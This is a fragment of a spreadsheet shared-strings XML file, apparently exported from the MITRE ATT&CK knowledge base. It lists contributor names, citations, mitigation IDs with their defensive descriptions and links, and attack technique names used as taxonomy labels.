  <si>
    <t>20 September 2022</t>
  </si>
  <si>
    <t>08 September 2022</t>
  </si>
  <si>
    <t>26 September 2022</t>
  </si>
  <si>
    <t>Matt Brenton, Zurich Insurance Group</t>
  </si>
  <si>
    <t>Andrea Serrano Urea, Telefónica Tech</t>
  </si>
  <si>
    <t>Erik Schamper, @Schamperr, Fox-IT; Maarten van Dantzig, @MaartenVDantzig, Fox-IT</t>
  </si>
  <si>
    <t>(Citation: Mandiant UNC3890 Aug 2022),(Citation: Mandiant UNC3890 Aug 2022),</t>
  </si>
  <si>
    <t>(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>(Citation: DFIR Conti Bazar Nov 2021),(Citation: DFIR Conti Bazar Nov 2021),</t>
  </si>
  <si>
    <t>(Citation: BlackBerry CostaRicto November 2020),(Citation: BlackBerry CostaRicto November 2020),</t>
  </si>
  <si>
    <t>(Citation: Talos Frankenstein June 2019),(Citation: Talos Frankenstein June 2019),</t>
  </si>
  <si>
    <t>(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),</t>
  </si>
  <si>
    <t>(Citation: McAfee Night Dragon),(Citation: McAfee Night Dragon),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Cybereason OperationCuckooBees May 2022),</t>
  </si>
  <si>
    <t>(Citation: Cylance Dust Storm),(Citation: Cylance Dust Storm),</t>
  </si>
  <si>
    <t>(Citation: McAfee Honeybee),(Citation: McAfee Honeybee),</t>
  </si>
  <si>
    <t>(Citation: McAfee Sharpshooter December 2018),(Citation: Bleeping Computer Op Sharpshooter March 2019),(Citation: Threatpost New Op Sharpshooter Data March 2019),(Citation: McAfee Sharpshooter December 2018),(Citation: Bleeping Computer Op Sharpshooter March 2019),</t>
  </si>
  <si>
    <t>(Citation: ESET Operation Spalax Jan 2021),(Citation: ESET Operation Spalax Jan 2021),</t>
  </si>
  <si>
    <t>(Citation: FoxIT Wocao December 2019),(Citation: FoxIT Wocao December 2019),</t>
  </si>
  <si>
    <t>M1036</t>
  </si>
  <si>
    <t>M1015</t>
  </si>
  <si>
    <t>M1049</t>
  </si>
  <si>
    <t>M1013</t>
  </si>
  <si>
    <t>M1048</t>
  </si>
  <si>
    <t>M1047</t>
  </si>
  <si>
    <t>M1040</t>
  </si>
  <si>
    <t>M1046</t>
  </si>
  <si>
    <t>M1045</t>
  </si>
  <si>
    <t>M1043</t>
  </si>
  <si>
    <t>M1053</t>
  </si>
  <si>
    <t>M1057</t>
  </si>
  <si>
    <t>M1042</t>
  </si>
  <si>
    <t>M1055</t>
  </si>
  <si>
    <t>M1041</t>
  </si>
  <si>
    <t>M1039</t>
  </si>
  <si>
    <t>M1038</t>
  </si>
  <si>
    <t>M1050</t>
  </si>
  <si>
    <t>M1037</t>
  </si>
  <si>
    <t>M1035</t>
  </si>
  <si>
    <t>M1034</t>
  </si>
  <si>
    <t>M1033</t>
  </si>
  <si>
    <t>M1032</t>
  </si>
  <si>
    <t>M1031</t>
  </si>
  <si>
    <t>M1030</t>
  </si>
  <si>
    <t>M1028</t>
  </si>
  <si>
    <t>M1027</t>
  </si>
  <si>
    <t>M1056</t>
  </si>
  <si>
    <t>M1026</t>
  </si>
  <si>
    <t>M1025</t>
  </si>
  <si>
    <t>M1029</t>
  </si>
  <si>
    <t>M1022</t>
  </si>
  <si>
    <t>M1044</t>
  </si>
  <si>
    <t>M1024</t>
  </si>
  <si>
    <t>M1021</t>
  </si>
  <si>
    <t>M1020</t>
  </si>
  <si>
    <t>M1054</t>
  </si>
  <si>
    <t>M1019</t>
  </si>
  <si>
    <t>M1051</t>
  </si>
  <si>
    <t>M1052</t>
  </si>
  <si>
    <t>M1018</t>
  </si>
  <si>
    <t>M1017</t>
  </si>
  <si>
    <t>M1016</t>
  </si>
  <si>
    <t>Account Use Policies</t>
  </si>
  <si>
    <t>Active Directory Configuration</t>
  </si>
  <si>
    <t>Antivirus/Antimalware</t>
  </si>
  <si>
    <t>Application Developer Guidance</t>
  </si>
  <si>
    <t>Application Isolation and Sandboxing</t>
  </si>
  <si>
    <t>Audit</t>
  </si>
  <si>
    <t>Behavior Prevention on Endpoint</t>
  </si>
  <si>
    <t>Boot Integrity</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Credential Access Protection</t>
  </si>
  <si>
    <t>Data Backup</t>
  </si>
  <si>
    <t>Data Loss Prevention</t>
  </si>
  <si>
    <t>Disable or Remove Feature or Program</t>
  </si>
  <si>
    <t>Do Not Mitigate</t>
  </si>
  <si>
    <t>Encrypt Sensitive Information</t>
  </si>
  <si>
    <t>Environment Variable Permissions</t>
  </si>
  <si>
    <t>Execution Prevention</t>
  </si>
  <si>
    <t>Exploit Protection</t>
  </si>
  <si>
    <t>Filter Network Traffic</t>
  </si>
  <si>
    <t>Limit Access to Resource Over Network</t>
  </si>
  <si>
    <t>Limit Hardware Installation</t>
  </si>
  <si>
    <t>Limit Software Installation</t>
  </si>
  <si>
    <t>Multi-factor Authentication</t>
  </si>
  <si>
    <t>Network Intrusion Prevention</t>
  </si>
  <si>
    <t>Network Segmentation</t>
  </si>
  <si>
    <t>Operating System Configuration</t>
  </si>
  <si>
    <t>Password Policies</t>
  </si>
  <si>
    <t>Pre-compromise</t>
  </si>
  <si>
    <t>Privileged Account Management</t>
  </si>
  <si>
    <t>Privileged Process Integrity</t>
  </si>
  <si>
    <t>Remote Data Storage</t>
  </si>
  <si>
    <t>Restrict File and Directory Permissions</t>
  </si>
  <si>
    <t>Restrict Library Loading</t>
  </si>
  <si>
    <t>Restrict Registry Permissions</t>
  </si>
  <si>
    <t>Restrict Web-Based Content</t>
  </si>
  <si>
    <t>SSL/TLS Inspection</t>
  </si>
  <si>
    <t>Software Configuration</t>
  </si>
  <si>
    <t>Threat Intelligence Program</t>
  </si>
  <si>
    <t>Update Software</t>
  </si>
  <si>
    <t>User Account Control</t>
  </si>
  <si>
    <t>User Account Management</t>
  </si>
  <si>
    <t>User Training</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>Configure features related to account use like login attempt lockouts, specific login times, etc.</t>
  </si>
  <si>
    <t>Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.</t>
  </si>
  <si>
    <t>Use signatures or heuristics to detect malicious software.</t>
  </si>
  <si>
    <t>This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.</t>
  </si>
  <si>
    <t>Restrict execution of code to a virtual environment on or in transit to an endpoint system.</t>
  </si>
  <si>
    <t>Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.</t>
  </si>
  <si>
    <t>Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.</t>
  </si>
  <si>
    <t>Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.</t>
  </si>
  <si>
    <t>Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.</t>
  </si>
  <si>
    <t>Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.</t>
  </si>
  <si>
    <t>Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.</t>
  </si>
  <si>
    <t>Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)</t>
  </si>
  <si>
    <t>Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.</t>
  </si>
  <si>
    <t>This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.</t>
  </si>
  <si>
    <t>Protect sensitive information with strong encryption.</t>
  </si>
  <si>
    <t>Prevent modification of environment variables by unauthorized users and groups.</t>
  </si>
  <si>
    <t>Block execution of code on a system through application control, and/or script blocking.</t>
  </si>
  <si>
    <t>Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.</t>
  </si>
  <si>
    <t>Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.</t>
  </si>
  <si>
    <t>Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.</t>
  </si>
  <si>
    <t>Block users or groups from installing or using unapproved hardware on systems, including USB devices.</t>
  </si>
  <si>
    <t>Block users or groups from installing unapproved software.</t>
  </si>
  <si>
    <t>Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.</t>
  </si>
  <si>
    <t>Use intrusion detection signatures to block traffic at network boundaries.</t>
  </si>
  <si>
    <t>Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.</t>
  </si>
  <si>
    <t>Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.</t>
  </si>
  <si>
    <t>Set and enforce secure password policies for accounts.</t>
  </si>
  <si>
    <t>This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.</t>
  </si>
  <si>
    <t>Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.</t>
  </si>
  <si>
    <t>Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.</t>
  </si>
  <si>
    <t>Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.</t>
  </si>
  <si>
    <t>Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.</t>
  </si>
  <si>
    <t>Restrict the ability to modify certain hives or keys in the Windows Registry.</t>
  </si>
  <si>
    <t>Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.</t>
  </si>
  <si>
    <t>Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.</t>
  </si>
  <si>
    <t>Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.</t>
  </si>
  <si>
    <t>A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.</t>
  </si>
  <si>
    <t>Perform regular software updates to mitigate exploitation risk.</t>
  </si>
  <si>
    <t>Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to user accounts.</t>
  </si>
  <si>
    <t>Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.</t>
  </si>
  <si>
    <t>Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1036</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1015</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1049</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1048</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1047</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1040</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1046</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1045</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1043</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1053</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1057</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1042</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1055</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1041</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1039</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1038</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1050</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1037</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1035</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1034</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1033</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1032</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1031</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1030</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1028</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1027</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1056</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1026</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1025</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1029</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1022</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1044</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1024</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1021</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1020</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1054</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1019</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1051</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1052</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1018</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1017</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1016</t>
  </si>
  <si>
    <t>11 June 2019</t>
  </si>
  <si>
    <t>06 June 2019</t>
  </si>
  <si>
    <t>25 October 2017</t>
  </si>
  <si>
    <t>10 June 2019</t>
  </si>
  <si>
    <t>23 July 2019</t>
  </si>
  <si>
    <t>28 February 2022</t>
  </si>
  <si>
    <t>(Citation: SpecterOps Certified Pre Owned),(Citation: STIG krbtgt reset),(Citation: ADSecurity Mimikatz DCSync),(Citation: Mandiant Defend UNC2452 White Paper),(Citation: Microsoft SID Filtering Quarantining Jan 2009),(Citation: Microsoft Replication ACL),(Citation: ADSecurity Kerberos and KRBTGT),(Citation: Microsoft Netdom Trust Sept 2012),(Citation: AdSecurity DCSync Sept 2015),(Citation: Microsoft Trust Considerations Nov 2014),(Citation: Microsoft Protected Users Security Group),(Citation: AdSecurity Kerberos GT Aug 2015),(Citation: Microsoft MS14-025)</t>
  </si>
  <si>
    <t>(Citation: SourceForge rkhunter),(Citation: Microsoft AMSI June 2015),(Citation: Chkrootkit Main),(Citation: Anomali Template Injection MAR 2018)</t>
  </si>
  <si>
    <t>(Citation: Apple App Security Overview),(Citation: Apple Developer Doco Hardened Runtime),(Citation: FireEye DLL Side-Loading)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Protected View),(Citation: Kubernetes Hardening Guide),(Citation: Windows Blogs Microsoft Edge Sandbox),(Citation: Ars Technica Pwn2Own 2017 VM Escape)</t>
  </si>
  <si>
    <t>(Citation: GitHub Certify),(Citation: Secureworks - AT.exe Scheduled Task),(Citation: Cisco IOS Software Integrity Assurance - Image File Verification),(Citation: Cisco IOS Software Integrity Assurance - Change Control),(Citation: Vulnerability and Exploit Detector),(Citation: Cisco IOS Software Integrity Assurance - Image File Integrity),(Citation: Powersploit),(Citation: GitHub Bloodhound),(Citation: Microsoft Preauthentication Jul 2012),(Citation: MagicWeb),(Citation: GitHub PSPKIAudit),(Citation: ADSecurity Finding Passwords in SYSVOL),(Citation: Kifarunix - Task Scheduling in Linux),(Citation: Microsoft CreateProcess),(Citation: FireEye ADFS),(Citation: Microsoft Dynamic-Link Library Security),(Citation: Mandiant Azure AD Backdoors),(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2),(Citation: SpecterOps Certified Pre Owned),(Citation: Github UACMe),(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019),(Citation: Microsoft Get-InboxRule),(Citation: Amazon S3 Security, 2019),(Citation: Kubernetes Hardening Guide),(Citation: Pfammatter - Hidden Inbox Rules),(Citation: Microsoft Sxstrace)</t>
  </si>
  <si>
    <t>(Citation: win10_asr),(Citation: Microsoft_rec_block_rules),(Citation: Enigma Reviving DDE Jan 2018),(Citation: Microsoft driver block rules),(Citation: Malicious Driver Reporting Center),(Citation: Microsoft ASR Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: TCG Trusted Platform Module),(Citation: Intel Hardware-based Security Technologies),(Citation: ESET LoJax Sept 2018),(Citation: Microsoft TESTSIGNING Feb 2021),(Citation: Cisco IOS Software Integrity Assurance - Secure Boot),(Citation: TechNet Secure Boot Process)</t>
  </si>
  <si>
    <t>(Citation: applescript signing),(Citation: Content trust in Docker),(Citation: Content trust in Azure Container Registry),(Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)</t>
  </si>
  <si>
    <t>(Citation: Cisco IOS Software Integrity Assurance - AAA),(Citation: Microsoft Enable Cred Guard April 2017),(Citation: GitHub SHB Credential Guard),(Citation: Cisco IOS Software Integrity Assurance - Credentials Management),(Citation: TechNet Credential Guard),(Citation: Microsoft Credential Guard April 2017)</t>
  </si>
  <si>
    <t>(Citation: Rhino S3 Ransomware Part 2),(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Disable Macros),(Citation: ADSecurity Windows Secure Baseline),(Citation: TechNet Screensaver GP),(Citation: Microsoft BEC Campaign),(Citation: TechNet Removable Media Control),(Citation: Microsoft DDE Advisory Nov 2017),(Citation: Microsoft ADV170021 Dec 2017),(Citation: BleepingComputer DDE Disabled in Word Dec 2017),(Citation: Microsoft AlwaysInstallElevated 2018),(Citation: Microsoft Network access Credential Manager),(Citation: MRWLabs Office Persistence Add-ins),(Citation: Amazon AWS IMDS V2),(Citation: Microsoft Disable Autorun),(Citation: Microsoft Disable DCOM),(Citation: SpecterOps Certified Pre Owned),(Citation: ITSyndicate Disabling PHP functions),(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing),(Citation: Symantec SSH and ssh-agent),(Citation: GitHub MOTW),(Citation: GitHub Disable DDEAUTO Oct 2017),(Citation: Microsoft Disable VBA Jan 2020),(Citation: Gmail Delegation)</t>
  </si>
  <si>
    <t>(Citation: SpecterOps Certified Pre Owned),(Citation: Microsoft Azure Storage Security, 2019),(Citation: Metcalf 2015),(Citation: Amazon S3 Security, 2019),(Citation: US-CERT TA17-156A SNMP Abuse 2017),(Citation: AdSecurity Cracking Kerberos Dec 2015),(Citation: Google Cloud Encryption Key Rotation)</t>
  </si>
  <si>
    <t>(Citation: Securing bash history)</t>
  </si>
  <si>
    <t>(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: Microsoft Driver Block Rules),(Citation: Microsoft Using Software Restriction ),(Citation: NSA MS AppLocker),(Citation: Corio 2008),(Citation: Microsoft Application Lockdown),(Citation: Microsoft WDAC),(Citation: Microsoft Windows Defender Application Control),(Citation: Beechey 2010),(Citation: Default VBS macros Blocking ),(Citation: Kernel Self Protection Project),(Citation: Microsoft ISAPICGIRestriction 2016),(Citation: Wikibooks Grsecurity),(Citation: Kernel.org Restrict Kernel Module),(Citation: Increasing Linux kernel integrity),(Citation: Dormann Dangers of VHD 2019),(Citation: SANS Application Whitelisting),(Citation: Kubernetes Hardening Guide),(Citation: TechNet Applocker vs SRP),(Citation: Windows Commands JPCERT),(Citation: Technospot Chrome Extensions GP),(Citation: LKM loading kernel restrictions)</t>
  </si>
  <si>
    <t>(Citation: Wikipedia Control Flow Integrity),(Citation: Beechey 2010),(Citation: TechNet Moving Beyond EMET),(Citation: NSA MS AppLocker),(Citation: Secure Host Baseline EMET),(Citation: TechNet Applocker vs SRP),(Citation: Windows Commands JPCERT),(Citation: Corio 2008),(Citation: Microsoft Windows Defender Application Control)</t>
  </si>
  <si>
    <t>(Citation: Cisco ARP Poisoning Mitigation 2016),(Citation: Microsoft Preventing SMB),(Citation: byt3bl33d3r NTLM Relaying),(Citation: US-CERT TA17-156A SNMP Abuse 2017),(Citation: US-CERT APT Energy Oct 2017),(Citation: RedLock Instance Metadata API 2018),(Citation: US-CERT SMB Security),(Citation: CERT-EU DDoS March 2017),(Citation: Juniper DAI 2020),(Citation: Secure Ideas SMB Relay),(Citation: Microsoft SMB Packet Signing),(Citation: ntlm_relaying_kerberos_del)</t>
  </si>
  <si>
    <t>(Citation: Kubernetes API Control Access),(Citation: Docker Daemon Socket Protect),(Citation: Wikipedia 802.1x),(Citation: TechNet RDP Gateway)</t>
  </si>
  <si>
    <t>(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: Microsoft - Device Registration),(Citation: Microsoft Nobelium Admin Privileges),(Citation: Amazon S3 Security, 2019),(Citation: Expel IO Evil in AWS),(Citation: CISA MFA PrintNightmare),(Citation: MFA Fatigue Attacks - PortSwigger),(Citation: Evilginx 2 July 2018),(Citation: AWS - IAM Console Best Practices),(Citation: Berkley Secure)</t>
  </si>
  <si>
    <t>(Citation: dhcp_serv_op_events),(Citation: Cisco Umbrella DGA Brute Force),(Citation: Akamai DGA Mitigation),(Citation: Cybereason Dissecting DGAs),(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018),(Citation: US-CERT-TA18-106A),(Citation: Anomali Template Injection MAR 2018),(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>(Citation: Harmj0y Domain Trusts),(Citation: NSA Spotting),(Citation: US-CERT TA17-156A SNMP Abuse 2017),(Citation: TechNet Firewall Design)</t>
  </si>
  <si>
    <t>(Citation: UCF STIG Elevation Account Enumeration),(Citation: Tilbury Windows Credentials),(Citation: TechNet Server Operator Scheduled Task),(Citation: TechRepublic Wireless GPO FEB 2009),(Citation: Microsoft WDigest Mit),(Citation: Windows RDP Sessions),(Citation: Microsoft GPO Bluetooth FEB 2009),(Citation: TechNet Removable Media Control),(Citation: Microsoft BITS),(Citation: Microsoft Disable NTLM Nov 2012),(Citation: HowToGeek ShowExtension),(Citation: Seqrite DoubleExtension),(Citation: Apple Developer Doco Hardened Runtime),(Citation: Windows Anonymous Enumeration of SAM Accounts),(Citation: TechNet RDP NLA),(Citation: SpectorOps Code Signing Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet),(Citation: NIST 800-63-3),(Citation: AdSecurity Cracking Kerberos Dec 2015),(Citation: store_pwd_rev_enc),(Citation: AWS - IAM Console Best Practices),(Citation: Microsoft Install Password Filter n.d)</t>
  </si>
  <si>
    <t>(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: Microsoft System Wide Com Keys),(Citation: Cisco IOS Software Integrity Assurance - AAA),(Citation: FireEye WMI 2015),(Citation: Microsoft Replace Process Token),(Citation: AdSecurity Cracking Kerberos Dec 2015),(Citation: Microsoft COM ACL),(Citation: TechNet Scheduling Priority),(Citation: Microsoft Create Token),(Citation: Microsoft Securing Privileged Access),(Citation: TechNet Least Privilege),(Citation: Tilbury Windows Credentials),(Citation: TechNet Credential Theft),(Citation: MagicWeb),(Citation: ADSecurity AD Kerberos Attacks),(Citation: FireEye ADFS),(Citation: Microsoft Process Wide Com Keys),(Citation: CyberArk Labs Safe Mode 2016),(Citation: Microsoft runas),(Citation: Netspi PowerShell Execution Policy Bypass),(Citation: Microsoft Remote Use of Local),(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>(Citation: Microsoft LSA),(Citation: Microsoft LSA Protection Mar 2014),(Citation: Graeber 2014),(Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>(Citation: win_xml_evt_log),(Citation: create_sym_links),(Citation: Microsoft W32Time May 2017),(Citation: InsiderThreat NTFS EA Oct 2017),(Citation: Microsoft ETW May 2018),(Citation: piazza launch agent mitigation)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Dynamic Link Library Search Order),(Citation: Microsoft More information about DLL),(Citation: Microsoft DLL Security)</t>
  </si>
  <si>
    <t>(Citation: Microsoft W32Time May 2017),(Citation: def_ev_win_event_logging),(Citation: Microsoft System Services Fundamentals)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Azure AD Admin Consent)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Anti Spoofing),(Citation: ACSC Email Spoofing),(Citation: CyberArk Labs Safe Mode 2016),(Citation: Wikipedia HPKP),(Citation: Cisco Securing SNMP),(Citation: GitHub Disable DDEAUTO Oct 2017),(Citation: Enigma Reviving DDE Jan 2018),(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018),(Citation: Palo Alto Office Test Sofacy),(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>(Citation: MS14-025),(Citation: Github UACMe),(Citation: SensePost Outlook Forms),(Citation: ADSecurity Finding Passwords in SYSVOL),(Citation: NSA Spotting),(Citation: SensePost Outlook Home Page),(Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>(Citation: GitHub IAD Secure Host Baseline UAC Filtering),(Citation: Executable Installers are Vulnerable)</t>
  </si>
  <si>
    <t>(Citation: Microsoft WMI Filters),(Citation: Wald0 Guide to GPOs),(Citation: Microsoft SolarWinds Customer Guidance),(Citation: Office 365 Partner Relationships),(Citation: Cisco IOS Software Integrity Assurance - AAA),(Citation: Amazon  AWS Temporary Security Credentials),(Citation: Microsoft Azure Storage Security, 2019),(Citation: MDMProfileConfigMacOS),(Citation: Amazon S3 Security, 2019),(Citation: Expel IO Evil in AWS),(Citation: Mandiant M-Trends 2020),(Citation: Microsoft GPO Security Filtering),(Citation: Kubernetes Hardening Guide),(Citation: NSA and ASD Detect and Prevent Web Shells 2020),(Citation: Microsoft ETW May 2018),(Citation: Symantec BITS May 2007),(Citation: Apple TN2459 Kernel Extensions),(Citation: UCF STIG Symbolic Links)</t>
  </si>
  <si>
    <t>(Citation: Re-Open windows on Mac)</t>
  </si>
  <si>
    <t>(Citation: OWASP Top 10)</t>
  </si>
  <si>
    <t>Scanning IP Blocks</t>
  </si>
  <si>
    <t>Wordlist Scanning</t>
  </si>
  <si>
    <t>Client Configurations</t>
  </si>
  <si>
    <t>Firmware</t>
  </si>
  <si>
    <t>Hardware</t>
  </si>
  <si>
    <t>Software</t>
  </si>
  <si>
    <t>Credentials</t>
  </si>
  <si>
    <t>Email Addresses</t>
  </si>
  <si>
    <t>Employee Names</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>Domain Properties</t>
  </si>
  <si>
    <t>IP Addresses</t>
  </si>
  <si>
    <t>Network Security Appliances</t>
  </si>
  <si>
    <t>Network Topology</t>
  </si>
  <si>
    <t>Network Trust Dependencies</t>
  </si>
  <si>
    <t>Business Relationships</t>
  </si>
  <si>
    <t>Determine Physical Locations</t>
  </si>
  <si>
    <t>Identify Business Tempo</t>
  </si>
  <si>
    <t>Identify Roles</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>Spearphishing Service</t>
  </si>
  <si>
    <t>Purchase Technical Data</t>
  </si>
  <si>
    <t>Threat Intel Vendors</t>
  </si>
  <si>
    <t>CDNs</t>
  </si>
  <si>
    <t>DNS/Passive DNS</t>
  </si>
  <si>
    <t>Digital Certificates</t>
  </si>
  <si>
    <t>Scan Databases</t>
  </si>
  <si>
    <t>WHOIS</t>
  </si>
  <si>
    <t>Code Repositories</t>
  </si>
  <si>
    <t>Search Engines</t>
  </si>
  <si>
    <t>Social Media</t>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t>DNS Server</t>
  </si>
  <si>
    <t>Domains</t>
  </si>
  <si>
    <t>Server</t>
  </si>
  <si>
    <t>Serverless</t>
  </si>
  <si>
    <t>Virtual Private Server</t>
  </si>
  <si>
    <t>Web Services</t>
  </si>
  <si>
    <t>Cloud Accounts</t>
  </si>
  <si>
    <t>Email Accounts</t>
  </si>
  <si>
    <t>Social Media Accounts</t>
  </si>
  <si>
    <t>Code Signing Certificates</t>
  </si>
  <si>
    <t>Exploits</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>Tool</t>
  </si>
  <si>
    <t>Vulnerabilities</t>
  </si>
  <si>
    <t>Drive-by Target</t>
  </si>
  <si>
    <t>Install Digital Certificate</t>
  </si>
  <si>
    <t>Link Target</t>
  </si>
  <si>
    <t>SEO Poisoning</t>
  </si>
  <si>
    <t>Upload Malware</t>
  </si>
  <si>
    <t>Upload Tool</t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>Compromise Hardware Supply Chain</t>
  </si>
  <si>
    <t>Compromise Software Dependencies and Development Tools</t>
  </si>
  <si>
    <t>Compromise Software Supply Chain</t>
  </si>
  <si>
    <t>Default Accounts</t>
  </si>
  <si>
    <t>Domain Accounts</t>
  </si>
  <si>
    <t>Local Accounts</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>JavaScript</t>
  </si>
  <si>
    <t>Network Device CLI</t>
  </si>
  <si>
